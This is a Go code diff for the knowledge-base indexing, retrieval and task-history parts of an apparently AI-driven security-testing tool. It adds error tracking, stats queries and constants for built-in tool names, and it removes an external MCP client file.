// cleanupHistory 清理过期的历史记录
|
||||
func (m *AgentTaskManager) cleanupHistory() {
|
||||
now := time.Now()
|
||||
cutoffTime := now.Add(-m.historyRetention)
|
||||
|
||||
// 过滤掉过期的记录
|
||||
validTasks := make([]*CompletedTask, 0, len(m.completedTasks))
|
||||
for _, task := range m.completedTasks {
|
||||
if task.CompletedAt.After(cutoffTime) {
|
||||
validTasks = append(validTasks, task)
|
||||
}
|
||||
}
|
||||
|
||||
// 如果仍然超过最大数量,只保留最新的
|
||||
if len(validTasks) > m.maxHistorySize {
|
||||
// 按完成时间排序,保留最新的
|
||||
// 由于是追加的,最新的在最后,所以直接取最后N个
|
||||
start := len(validTasks) - m.maxHistorySize
|
||||
validTasks = validTasks[start:]
|
||||
}
|
||||
|
||||
m.completedTasks = validTasks
|
||||
}
|
||||
|
||||
// GetActiveTasks 返回所有正在运行的任务
|
||||
func (m *AgentTaskManager) GetActiveTasks() []*AgentTask {
|
||||
m.mu.RLock()
|
||||
@@ -137,3 +192,35 @@ func (m *AgentTaskManager) GetActiveTasks() []*AgentTask {
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// GetCompletedTasks 返回最近完成的任务历史
|
||||
func (m *AgentTaskManager) GetCompletedTasks() []*CompletedTask {
|
||||
m.mu.RLock()
|
||||
defer m.mu.RUnlock()
|
||||
|
||||
// 清理过期记录(只读锁,不影响其他操作)
|
||||
// 注意:这里不能直接调用cleanupHistory,因为需要写锁
|
||||
// 所以返回时过滤过期记录
|
||||
now := time.Now()
|
||||
cutoffTime := now.Add(-m.historyRetention)
|
||||
|
||||
result := make([]*CompletedTask, 0, len(m.completedTasks))
|
||||
for _, task := range m.completedTasks {
|
||||
if task.CompletedAt.After(cutoffTime) {
|
||||
result = append(result, task)
|
||||
}
|
||||
}
|
||||
|
||||
// 按完成时间倒序排序(最新的在前)
|
||||
// 由于是追加的,最新的在最后,需要反转
|
||||
for i, j := 0, len(result)-1; i < j; i, j = i+1, j-1 {
|
||||
result[i], result[j] = result[j], result[i]
|
||||
}
|
||||
|
||||
// 限制返回数量
|
||||
if len(result) > m.maxHistorySize {
|
||||
result = result[:m.maxHistorySize]
|
||||
}
|
||||
|
||||
return result
|
||||
}
|
||||
|
||||
@@ -7,6 +7,8 @@ import (
|
||||
"fmt"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
@@ -19,6 +21,12 @@ type Indexer struct {
|
||||
logger *zap.Logger
|
||||
chunkSize int // 每个块的最大token数(估算)
|
||||
overlap int // 块之间的重叠token数
|
||||
|
||||
// 错误跟踪
|
||||
mu sync.RWMutex
|
||||
lastError string // 最近一次错误信息
|
||||
lastErrorTime time.Time // 最近一次错误时间
|
||||
errorCount int // 连续错误计数
|
||||
}
|
||||
|
||||
// NewIndexer 创建新的索引器
|
||||
@@ -267,13 +275,13 @@ func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error {
|
||||
chunks := idx.ChunkText(content)
|
||||
idx.logger.Info("知识项分块完成", zap.String("itemId", itemID), zap.Int("chunks", len(chunks)))
|
||||
|
||||
// 跟踪该知识项的错误
|
||||
itemErrorCount := 0
|
||||
var firstError error
|
||||
firstErrorChunkIndex := -1
|
||||
|
||||
// 向量化每个块(包含category和title信息,以便向量检索时能匹配到风险类型)
|
||||
for i, chunk := range chunks {
|
||||
chunkPreview := chunk
|
||||
if len(chunkPreview) > 200 {
|
||||
chunkPreview = chunkPreview[:200] + "..."
|
||||
}
|
||||
|
||||
// 将category和title信息包含到向量化的文本中
|
||||
// 格式:"[风险类型: {category}] [标题: {title}]\n{chunk内容}"
|
||||
// 这样向量嵌入就会包含风险类型信息,即使SQL过滤失败,向量相似度也能帮助匹配
|
||||
@@ -281,13 +289,43 @@ func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error {
|
||||
|
||||
embedding, err := idx.embedder.EmbedText(ctx, textForEmbedding)
|
||||
if err != nil {
|
||||
idx.logger.Warn("向量化失败",
|
||||
zap.String("itemId", itemID),
|
||||
zap.Int("chunkIndex", i),
|
||||
zap.Int("chunkLength", len(chunk)),
|
||||
zap.String("chunkPreview", chunkPreview),
|
||||
zap.Error(err),
|
||||
)
|
||||
itemErrorCount++
|
||||
if firstError == nil {
|
||||
firstError = err
|
||||
firstErrorChunkIndex = i
|
||||
// 只在第一个块失败时记录详细日志
|
||||
chunkPreview := chunk
|
||||
if len(chunkPreview) > 200 {
|
||||
chunkPreview = chunkPreview[:200] + "..."
|
||||
}
|
||||
idx.logger.Warn("向量化失败",
|
||||
zap.String("itemId", itemID),
|
||||
zap.Int("chunkIndex", i),
|
||||
zap.Int("totalChunks", len(chunks)),
|
||||
zap.String("chunkPreview", chunkPreview),
|
||||
zap.Error(err),
|
||||
)
|
||||
|
||||
// 更新全局错误跟踪
|
||||
errorMsg := fmt.Sprintf("向量化失败 (知识项: %s): %v", itemID, err)
|
||||
idx.mu.Lock()
|
||||
idx.lastError = errorMsg
|
||||
idx.lastErrorTime = time.Now()
|
||||
idx.mu.Unlock()
|
||||
}
|
||||
|
||||
// 如果连续失败2个块,立即停止处理该知识项(降低阈值,更快停止)
|
||||
// 这样可以避免继续浪费API调用,同时也能更快地检测到配置问题
|
||||
if itemErrorCount >= 2 {
|
||||
idx.logger.Error("知识项连续向量化失败,停止处理",
|
||||
zap.String("itemId", itemID),
|
||||
zap.Int("totalChunks", len(chunks)),
|
||||
zap.Int("failedChunks", itemErrorCount),
|
||||
zap.Int("firstErrorChunkIndex", firstErrorChunkIndex),
|
||||
zap.Error(firstError),
|
||||
)
|
||||
return fmt.Errorf("知识项连续向量化失败 (%d个块失败): %v", itemErrorCount, firstError)
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
@@ -321,6 +359,13 @@ func (idx *Indexer) HasIndex() (bool, error) {
|
||||
|
||||
// RebuildIndex 重建所有索引
|
||||
func (idx *Indexer) RebuildIndex(ctx context.Context) error {
|
||||
// 重置错误跟踪
|
||||
idx.mu.Lock()
|
||||
idx.lastError = ""
|
||||
idx.lastErrorTime = time.Time{}
|
||||
idx.errorCount = 0
|
||||
idx.mu.Unlock()
|
||||
|
||||
rows, err := idx.db.Query("SELECT id FROM knowledge_base_items")
|
||||
if err != nil {
|
||||
return fmt.Errorf("查询知识项失败: %w", err)
|
||||
@@ -348,14 +393,84 @@ func (idx *Indexer) RebuildIndex(ctx context.Context) error {
|
||||
idx.logger.Info("已清空旧索引,开始重建")
|
||||
}
|
||||
|
||||
failedCount := 0
|
||||
consecutiveFailures := 0
|
||||
maxConsecutiveFailures := 2 // 连续失败2次后立即停止(降低阈值,更快停止)
|
||||
firstFailureItemID := ""
|
||||
var firstFailureError error
|
||||
|
||||
for i, itemID := range itemIDs {
|
||||
if err := idx.IndexItem(ctx, itemID); err != nil {
|
||||
idx.logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
|
||||
failedCount++
|
||||
consecutiveFailures++
|
||||
|
||||
// 只在第一个失败时记录详细日志
|
||||
if consecutiveFailures == 1 {
|
||||
firstFailureItemID = itemID
|
||||
firstFailureError = err
|
||||
idx.logger.Warn("索引知识项失败",
|
||||
zap.String("itemId", itemID),
|
||||
zap.Int("totalItems", len(itemIDs)),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
|
||||
// 如果连续失败过多,可能是配置问题,立即停止索引
|
||||
if consecutiveFailures >= maxConsecutiveFailures {
|
||||
errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API密钥无效、余额不足等)。第一个失败项: %s, 错误: %v", consecutiveFailures, firstFailureItemID, firstFailureError)
|
||||
idx.mu.Lock()
|
||||
idx.lastError = errorMsg
|
||||
idx.lastErrorTime = time.Now()
|
||||
idx.mu.Unlock()
|
||||
|
||||
idx.logger.Error("连续索引失败次数过多,立即停止索引",
|
||||
zap.Int("consecutiveFailures", consecutiveFailures),
|
||||
zap.Int("totalItems", len(itemIDs)),
|
||||
zap.Int("processedItems", i+1),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
return fmt.Errorf("连续索引失败次数过多: %v", firstFailureError)
|
||||
}
|
||||
|
||||
// 如果失败的知识项过多,记录警告但继续处理(降低阈值到30%)
|
||||
if failedCount > len(itemIDs)*3/10 && failedCount == len(itemIDs)*3/10+1 {
|
||||
errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项: %s, 错误: %v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError)
|
||||
idx.mu.Lock()
|
||||
idx.lastError = errorMsg
|
||||
idx.lastErrorTime = time.Now()
|
||||
idx.mu.Unlock()
|
||||
|
||||
idx.logger.Error("索引失败的知识项过多,可能存在配置问题",
|
||||
zap.Int("failedCount", failedCount),
|
||||
zap.Int("totalItems", len(itemIDs)),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
}
|
||||
continue
|
||||
}
|
||||
idx.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemIDs)))
|
||||
|
||||
// 成功时重置连续失败计数和第一个失败信息
|
||||
if consecutiveFailures > 0 {
|
||||
consecutiveFailures = 0
|
||||
firstFailureItemID = ""
|
||||
firstFailureError = nil
|
||||
}
|
||||
|
||||
// 减少进度日志频率(每10个或每10%记录一次)
|
||||
if (i+1)%10 == 0 || (len(itemIDs) > 0 && (i+1)*100/len(itemIDs)%10 == 0 && (i+1)*100/len(itemIDs) > 0) {
|
||||
idx.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemIDs)), zap.Int("failed", failedCount))
|
||||
}
|
||||
}
|
||||
|
||||
idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)))
|
||||
idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)), zap.Int("failedCount", failedCount))
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetLastError 获取最近一次错误信息
|
||||
func (idx *Indexer) GetLastError() (string, time.Time) {
|
||||
idx.mu.RLock()
|
||||
defer idx.mu.RUnlock()
|
||||
return idx.lastError, idx.lastErrorTime
|
||||
}
|
||||
|
||||
@@ -153,6 +153,25 @@ func (m *Manager) GetCategories() ([]string, error) {
|
||||
return categories, nil
|
||||
}
|
||||
|
||||
// GetStats 获取知识库统计信息
|
||||
func (m *Manager) GetStats() (int, int, error) {
|
||||
// 获取分类总数
|
||||
categories, err := m.GetCategories()
|
||||
if err != nil {
|
||||
return 0, 0, fmt.Errorf("获取分类失败: %w", err)
|
||||
}
|
||||
totalCategories := len(categories)
|
||||
|
||||
// 获取知识项总数
|
||||
var totalItems int
|
||||
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems)
|
||||
if err != nil {
|
||||
return totalCategories, 0, fmt.Errorf("获取知识项总数失败: %w", err)
|
||||
}
|
||||
|
||||
return totalCategories, totalItems, nil
|
||||
}
|
||||
|
||||
// GetCategoriesWithItems 按分类分页获取知识项(每个分类包含其下的所有知识项)
|
||||
// limit: 每页分类数量(0表示不限制)
|
||||
// offset: 偏移量(按分类偏移)
|
||||
@@ -359,7 +378,7 @@ func (m *Manager) SearchItemsByKeyword(keyword string, category string) ([]*Know
|
||||
// SQLite的LIKE不区分大小写,使用COLLATE NOCASE或LOWER()函数
|
||||
// 使用%keyword%进行模糊匹配
|
||||
searchPattern := "%" + keyword + "%"
|
||||
|
||||
|
||||
query = `
|
||||
SELECT id, category, title, file_path, created_at, updated_at
|
||||
FROM knowledge_base_items
|
||||
@@ -639,7 +658,12 @@ func (m *Manager) UpdateItem(id, category, title, content string) (*KnowledgeIte
|
||||
// 删除旧目录(如果为空)
|
||||
oldDir := filepath.Dir(item.FilePath)
|
||||
if entries, err := os.ReadDir(oldDir); err == nil && len(entries) == 0 {
|
||||
os.Remove(oldDir)
|
||||
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
|
||||
if oldDir != m.basePath {
|
||||
if err := os.Remove(oldDir); err != nil {
|
||||
m.logger.Warn("删除空目录失败", zap.String("dir", oldDir), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -686,6 +710,17 @@ func (m *Manager) DeleteItem(id string) error {
|
||||
return fmt.Errorf("删除知识项失败: %w", err)
|
||||
}
|
||||
|
||||
// 删除空目录(如果为空)
|
||||
dir := filepath.Dir(filePath)
|
||||
if entries, err := os.ReadDir(dir); err == nil && len(entries) == 0 {
|
||||
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
|
||||
if dir != m.basePath {
|
||||
if err := os.Remove(dir); err != nil {
|
||||
m.logger.Warn("删除空目录失败", zap.String("dir", dir), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
|
||||
@@ -161,14 +161,14 @@ func (r *Retriever) Search(ctx context.Context, req *SearchRequest) ([]*Retrieva
|
||||
|
||||
// 查询所有向量(或按风险类型过滤)
|
||||
// 使用精确匹配(=)以提高性能和准确性
|
||||
// 由于系统提供了 list_knowledge_risk_types 工具,用户应该使用准确的category名称
|
||||
// 同时,向量嵌入中已包含category信息,即使SQL过滤不完全匹配,向量相似度也能帮助匹配
|
||||
var rows *sql.Rows
|
||||
if req.RiskType != "" {
|
||||
// 使用精确匹配(=),性能更好且更准确
|
||||
// 使用 COLLATE NOCASE 实现大小写不敏感匹配,提高容错性
|
||||
// 注意:如果用户输入的risk_type与category不完全一致,可能匹配不到
|
||||
// 建议用户先调用 list_knowledge_risk_types 获取准确的category名称
|
||||
// 由于系统提供了内置工具来获取风险类型列表,用户应该使用准确的category名称
|
||||
// 同时,向量嵌入中已包含category信息,即使SQL过滤不完全匹配,向量相似度也能帮助匹配
|
||||
var rows *sql.Rows
|
||||
if req.RiskType != "" {
|
||||
// 使用精确匹配(=),性能更好且更准确
|
||||
// 使用 COLLATE NOCASE 实现大小写不敏感匹配,提高容错性
|
||||
// 注意:如果用户输入的risk_type与category不完全一致,可能匹配不到
|
||||
// 建议用户先调用相应的内置工具获取准确的category名称
|
||||
rows, err = r.db.Query(`
|
||||
SELECT e.id, e.item_id, e.chunk_index, e.chunk_text, e.embedding, i.category, i.title
|
||||
FROM knowledge_embeddings e
|
||||
|
||||
@@ -8,6 +8,7 @@ import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
@@ -21,7 +22,7 @@ func RegisterKnowledgeTool(
|
||||
) {
|
||||
// 注册第一个工具:获取所有可用的风险类型列表
|
||||
listRiskTypesTool := mcp.Tool{
|
||||
Name: "list_knowledge_risk_types",
|
||||
Name: builtin.ToolListKnowledgeRiskTypes,
|
||||
Description: "获取知识库中所有可用的风险类型(risk_type)列表。在搜索知识库之前,可以先调用此工具获取可用的风险类型,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间并提高检索准确性。",
|
||||
ShortDescription: "获取知识库中所有可用的风险类型列表",
|
||||
InputSchema: map[string]interface{}{
|
||||
@@ -62,7 +63,7 @@ func RegisterKnowledgeTool(
|
||||
for i, category := range categories {
|
||||
resultText.WriteString(fmt.Sprintf("%d. %s\n", i+1, category))
|
||||
}
|
||||
resultText.WriteString("\n提示:在调用 search_knowledge_base 工具时,可以使用上述风险类型之一作为 risk_type 参数,以缩小搜索范围并提高检索效率。")
|
||||
resultText.WriteString("\n提示:在调用 " + builtin.ToolSearchKnowledgeBase + " 工具时,可以使用上述风险类型之一作为 risk_type 参数,以缩小搜索范围并提高检索效率。")
|
||||
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
@@ -79,8 +80,8 @@ func RegisterKnowledgeTool(
|
||||
|
||||
// 注册第二个工具:搜索知识库(保持原有功能)
|
||||
searchTool := mcp.Tool{
|
||||
Name: "search_knowledge_base",
|
||||
Description: "在知识库中搜索相关的安全知识。当你需要了解特定漏洞类型、攻击技术、检测方法等安全知识时,可以使用此工具进行检索。工具使用向量检索和混合搜索技术,能够根据查询内容的语义相似度和关键词匹配,自动找到最相关的知识片段。建议:在搜索前可以先调用 list_knowledge_risk_types 工具获取可用的风险类型,然后使用正确的 risk_type 参数进行精确搜索,这样可以大幅减少检索时间。",
|
||||
Name: builtin.ToolSearchKnowledgeBase,
|
||||
Description: "在知识库中搜索相关的安全知识。当你需要了解特定漏洞类型、攻击技术、检测方法等安全知识时,可以使用此工具进行检索。工具使用向量检索和混合搜索技术,能够根据查询内容的语义相似度和关键词匹配,自动找到最相关的知识片段。建议:在搜索前可以先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型,然后使用正确的 risk_type 参数进行精确搜索,这样可以大幅减少检索时间。",
|
||||
ShortDescription: "搜索知识库中的安全知识(支持向量检索和混合搜索)",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
@@ -91,7 +92,7 @@ func RegisterKnowledgeTool(
|
||||
},
|
||||
"risk_type": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 list_knowledge_risk_types 工具获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。",
|
||||
"description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。",
|
||||
},
|
||||
},
|
||||
"required": []string{"query"},
|
||||
@@ -165,9 +166,9 @@ func RegisterKnowledgeTool(
|
||||
// 按文档分组结果,以便更好地展示上下文
|
||||
// 使用有序的slice来保持文档顺序(按最高混合分数)
|
||||
type itemGroup struct {
|
||||
itemID string
|
||||
results []*RetrievalResult
|
||||
maxScore float64 // 该文档的最高混合分数
|
||||
itemID string
|
||||
results []*RetrievalResult
|
||||
maxScore float64 // 该文档的最高混合分数
|
||||
}
|
||||
itemGroups := make([]*itemGroup, 0)
|
||||
itemMap := make(map[string]*itemGroup)
|
||||
@@ -177,8 +178,8 @@ func RegisterKnowledgeTool(
|
||||
group, exists := itemMap[itemID]
|
||||
if !exists {
|
||||
group = &itemGroup{
|
||||
itemID: itemID,
|
||||
results: make([]*RetrievalResult, 0),
|
||||
itemID: itemID,
|
||||
results: make([]*RetrievalResult, 0),
|
||||
maxScore: result.Score,
|
||||
}
|
||||
itemMap[itemID] = group
|
||||
@@ -219,7 +220,7 @@ func RegisterKnowledgeTool(
|
||||
})
|
||||
|
||||
// 显示主结果(混合分数最高的,同时显示相似度和混合分数)
|
||||
resultText.WriteString(fmt.Sprintf("--- 结果 %d (相似度: %.2f%%, 混合分数: %.2f%%) ---\n",
|
||||
resultText.WriteString(fmt.Sprintf("--- 结果 %d (相似度: %.2f%%, 混合分数: %.2f%%) ---\n",
|
||||
resultIndex, mainResult.Similarity*100, mainResult.Score*100))
|
||||
resultText.WriteString(fmt.Sprintf("来源: [%s] %s (ID: %s)\n", mainResult.Item.Category, mainResult.Item.Title, mainResult.Item.ID))
|
||||
|
||||
|
||||
@@ -0,0 +1,41 @@
|
||||
package builtin
|
||||
|
||||
// 内置工具名称常量
|
||||
// 所有代码中使用内置工具名称的地方都应该使用这些常量,而不是硬编码字符串
|
||||
const (
|
||||
// 漏洞管理工具
|
||||
ToolRecordVulnerability = "record_vulnerability"
|
||||
|
||||
// 知识库工具
|
||||
ToolListKnowledgeRiskTypes = "list_knowledge_risk_types"
|
||||
ToolSearchKnowledgeBase = "search_knowledge_base"
|
||||
|
||||
// Skills工具
|
||||
ToolListSkills = "list_skills"
|
||||
ToolReadSkill = "read_skill"
|
||||
)
|
||||
|
||||
// IsBuiltinTool 检查工具名称是否是内置工具
|
||||
func IsBuiltinTool(toolName string) bool {
|
||||
switch toolName {
|
||||
case ToolRecordVulnerability,
|
||||
ToolListKnowledgeRiskTypes,
|
||||
ToolSearchKnowledgeBase,
|
||||
ToolListSkills,
|
||||
ToolReadSkill:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
// GetAllBuiltinTools 返回所有内置工具名称列表
|
||||
func GetAllBuiltinTools() []string {
|
||||
return []string{
|
||||
ToolRecordVulnerability,
|
||||
ToolListKnowledgeRiskTypes,
|
||||
ToolSearchKnowledgeBase,
|
||||
ToolListSkills,
|
||||
ToolReadSkill,
|
||||
}
|
||||
}
|
||||
@@ -1,474 +0,0 @@
|
||||
package mcp
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
"os/exec"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// ExternalMCPClient 外部MCP客户端接口
|
||||
type ExternalMCPClient interface {
|
||||
// Initialize 初始化连接
|
||||
Initialize(ctx context.Context) error
|
||||
// ListTools 列出工具
|
||||
ListTools(ctx context.Context) ([]Tool, error)
|
||||
// CallTool 调用工具
|
||||
CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error)
|
||||
// Close 关闭连接
|
||||
Close() error
|
||||
// IsConnected 检查是否已连接
|
||||
IsConnected() bool
|
||||
// GetStatus 获取状态
|
||||
GetStatus() string
|
||||
}
|
||||
|
||||
// HTTPMCPClient HTTP模式的MCP客户端
|
||||
type HTTPMCPClient struct {
|
||||
url string
|
||||
timeout time.Duration
|
||||
client *http.Client
|
||||
logger *zap.Logger
|
||||
mu sync.RWMutex
|
||||
status string // "disconnected", "connecting", "connected", "error"
|
||||
}
|
||||
|
||||
// NewHTTPMCPClient 创建HTTP模式的MCP客户端
|
||||
func NewHTTPMCPClient(url string, timeout time.Duration, logger *zap.Logger) *HTTPMCPClient {
|
||||
if timeout <= 0 {
|
||||
timeout = 30 * time.Second
|
||||
}
|
||||
return &HTTPMCPClient{
|
||||
url: url,
|
||||
timeout: timeout,
|
||||
client: &http.Client{
|
||||
Timeout: timeout,
|
||||
},
|
||||
logger: logger,
|
||||
status: "disconnected",
|
||||
}
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) setStatus(status string) {
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
c.status = status
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) GetStatus() string {
|
||||
c.mu.RLock()
|
||||
defer c.mu.RUnlock()
|
||||
return c.status
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) IsConnected() bool {
|
||||
return c.GetStatus() == "connected"
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) Initialize(ctx context.Context) error {
|
||||
c.setStatus("connecting")
|
||||
|
||||
req := Message{
|
||||
ID: MessageID{value: "1"},
|
||||
Method: "initialize",
|
||||
Version: "2.0",
|
||||
}
|
||||
|
||||
params := InitializeRequest{
|
||||
ProtocolVersion: ProtocolVersion,
|
||||
Capabilities: make(map[string]interface{}),
|
||||
ClientInfo: ClientInfo{
|
||||
Name: "CyberStrikeAI",
|
||||
Version: "1.0.0",
|
||||
},
|
||||
}
|
||||
|
||||
paramsJSON, _ := json.Marshal(params)
|
||||
req.Params = paramsJSON
|
||||
|
||||
_, err := c.sendRequest(ctx, &req)
|
||||
if err != nil {
|
||||
c.setStatus("error")
|
||||
return fmt.Errorf("初始化失败: %w", err)
|
||||
}
|
||||
|
||||
c.setStatus("connected")
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) ListTools(ctx context.Context) ([]Tool, error) {
|
||||
req := Message{
|
||||
ID: MessageID{value: uuid.New().String()},
|
||||
Method: "tools/list",
|
||||
Version: "2.0",
|
||||
}
|
||||
|
||||
req.Params = json.RawMessage("{}")
|
||||
|
||||
resp, err := c.sendRequest(ctx, &req)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("获取工具列表失败: %w", err)
|
||||
}
|
||||
|
||||
var listResp ListToolsResponse
|
||||
if err := json.Unmarshal(resp.Result, &listResp); err != nil {
|
||||
return nil, fmt.Errorf("解析工具列表失败: %w", err)
|
||||
}
|
||||
|
||||
return listResp.Tools, nil
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error) {
|
||||
req := Message{
|
||||
ID: MessageID{value: uuid.New().String()},
|
||||
Method: "tools/call",
|
||||
Version: "2.0",
|
||||
}
|
||||
|
||||
callReq := CallToolRequest{
|
||||
Name: name,
|
||||
Arguments: args,
|
||||
}
|
||||
|
||||
paramsJSON, _ := json.Marshal(callReq)
|
||||
req.Params = paramsJSON
|
||||
|
||||
resp, err := c.sendRequest(ctx, &req)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("调用工具失败: %w", err)
|
||||
}
|
||||
|
||||
var callResp CallToolResponse
|
||||
if err := json.Unmarshal(resp.Result, &callResp); err != nil {
|
||||
return nil, fmt.Errorf("解析工具调用结果失败: %w", err)
|
||||
}
|
||||
|
||||
return &ToolResult{
|
||||
Content: callResp.Content,
|
||||
IsError: callResp.IsError,
|
||||
}, nil
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) sendRequest(ctx context.Context, msg *Message) (*Message, error) {
|
||||
body, err := json.Marshal(msg)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("序列化请求失败: %w", err)
|
||||
}
|
||||
|
||||
httpReq, err := http.NewRequestWithContext(ctx, http.MethodPost, c.url, bytes.NewReader(body))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("创建HTTP请求失败: %w", err)
|
||||
}
|
||||
|
||||
httpReq.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp, err := c.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("HTTP请求失败: %w", err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
bodyBytes, _ := io.ReadAll(resp.Body)
|
||||
return nil, fmt.Errorf("HTTP错误 %d: %s", resp.StatusCode, string(bodyBytes))
|
||||
}
|
||||
|
||||
var mcpResp Message
|
||||
if err := json.NewDecoder(resp.Body).Decode(&mcpResp); err != nil {
|
||||
return nil, fmt.Errorf("解析响应失败: %w", err)
|
||||
}
|
||||
|
||||
if mcpResp.Error != nil {
|
||||
return nil, fmt.Errorf("MCP错误: %s (code: %d)", mcpResp.Error.Message, mcpResp.Error.Code)
|
||||
}
|
||||
|
||||
return &mcpResp, nil
|
||||
}
|
||||
|
||||
func (c *HTTPMCPClient) Close() error {
|
||||
c.setStatus("disconnected")
|
||||
return nil
|
||||
}
|
||||
|
||||
// StdioMCPClient stdio模式的MCP客户端
|
||||
type StdioMCPClient struct {
|
||||
command string
|
||||
args []string
|
||||
timeout time.Duration
|
||||
cmd *exec.Cmd
|
||||
stdin io.WriteCloser
|
||||
stdout io.ReadCloser
|
||||
decoder *json.Decoder
|
||||
encoder *json.Encoder
|
||||
logger *zap.Logger
|
||||
mu sync.RWMutex
|
||||
status string
|
||||
requestID int64
|
||||
responses map[string]chan *Message
|
||||
responsesMu sync.Mutex
|
||||
ctx context.Context
|
||||
cancel context.CancelFunc
|
||||
}
|
||||
|
||||
// NewStdioMCPClient 创建stdio模式的MCP客户端
|
||||
func NewStdioMCPClient(command string, args []string, timeout time.Duration, logger *zap.Logger) *StdioMCPClient {
|
||||
if timeout <= 0 {
|
||||
timeout = 30 * time.Second
|
||||
}
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
return &StdioMCPClient{
|
||||
command: command,
|
||||
args: args,
|
||||
timeout: timeout,
|
||||
logger: logger,
|
||||
status: "disconnected",
|
||||
responses: make(map[string]chan *Message),
|
||||
ctx: ctx,
|
||||
cancel: cancel,
|
||||
}
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) setStatus(status string) {
|
||||
c.mu.Lock()
|
||||
defer c.mu.Unlock()
|
||||
c.status = status
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) GetStatus() string {
|
||||
c.mu.RLock()
|
||||
defer c.mu.RUnlock()
|
||||
return c.status
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) IsConnected() bool {
|
||||
return c.GetStatus() == "connected"
|
||||
}
|
||||
|
||||
func (c *StdioMCPClient) Initialize(ctx context.Context) error {
|
||||
c.setStatus("connecting")
|
||||
|
||||
if err := c.startProcess(); err != nil {
|
||||
c.setStatus("error")
|
||||
return fmt.Errorf("启动进程失败: %w", err)
|
||||
}
|
||||
|
||||
// 启动响应读取goroutine
|
||||
go c.readResponses()
|
||||
|
||||
// 发送初始化请求
|
||||
req := Message{
|
||||
ID: MessageID{value: "1"},
|
||||
Method: "initialize",
|
||||
Version: "2.0",
|
||||
}
|
||||
|
||||
params := InitializeRequest{
|
||||
ProtocolVersion: ProtocolVersion,
|
||||
Capabilities: make(map[string]interface{}),
|
||||
ClientInfo: ClientInfo{
|
||||
Name: "CyberStrikeAI",
|
||||
Version: "1.0.0",
|
||||
},
|
||||
}
|
||||
|
||||
paramsJSON, _ := json.Marshal(params)
|
||||
req.Params = paramsJSON
|
||||
|
||||
_, err := c.sendRequest(ctx, &req)
|
||||
if err != nil {
|
||||
c.setStatus("error")
|
||||
c.Close()
|
||||
return fmt.Errorf("初始化失败: %w", err)
|
||||
}
|
||||
|
||||
c.setStatus("connected")
|
||||
return nil
|
